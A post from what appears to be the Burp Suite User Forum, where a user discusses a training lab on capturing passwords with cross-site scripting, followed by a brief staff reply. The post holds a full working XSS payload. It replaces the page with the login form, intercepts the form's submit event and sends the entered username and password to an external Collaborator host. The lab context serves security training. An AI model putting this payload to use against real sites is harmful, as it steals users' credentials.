Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting cross-site scripting to capture passwords

slt | Last updated: Jul 16, 2024 02:29PM UTC

Hello! I think the description of what the simulated victim does should be updated on this lab. I used XSS to relace the current page content with the login form (after fetching it dynamically), then hook on the submit event to put the submission on hold while exfiltrating the credentials (assuming the simulated victim would try to login). It works as expected but would not solve the challenge. After looking at the solution, I'm quite disapointed! I feel my solution is way more subtle and nice ???? and should work with the simulated victim! Or at the very least, the description could be updated! Here is the payload I used: <script> fetch(location.href.toString().replace('/post?', '/login?')) .then(resp => resp.text()) .then(html => { const parser = new DOMParser(); let current_container = document.querySelector('div.container.is-page'); let doc = parser.parseFromString(html, 'text/html'); let doc_cont = doc.querySelector('div .container.is-page'); current_container.innerHTML = doc_cont.innerHTML; document.forms[0].addEventListener('submit', (evt) => { let form = document.forms[0]; evt.preventDefault(); let username = form.elements.username.value, password = form.elements.password.value; fetch("https://3hlexh2r5rea50zjl8l51ycksby2msah.oastify.com/?username=" + encodeURIComponent(username) + "&password=" + encodeURIComponent(password)) .then() .catch(() => { console.log("exfiltrated!"); document.forms[0].submit(); }); }); }) .catch(e => console.log(`ERROR: ${e}`)); </script> Thank you :-)

Ben, PortSwigger Agent | Last updated: Jul 17, 2024 09:48AM UTC

Hi, We can certainly pass your feedback on to the team. Thank you!

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.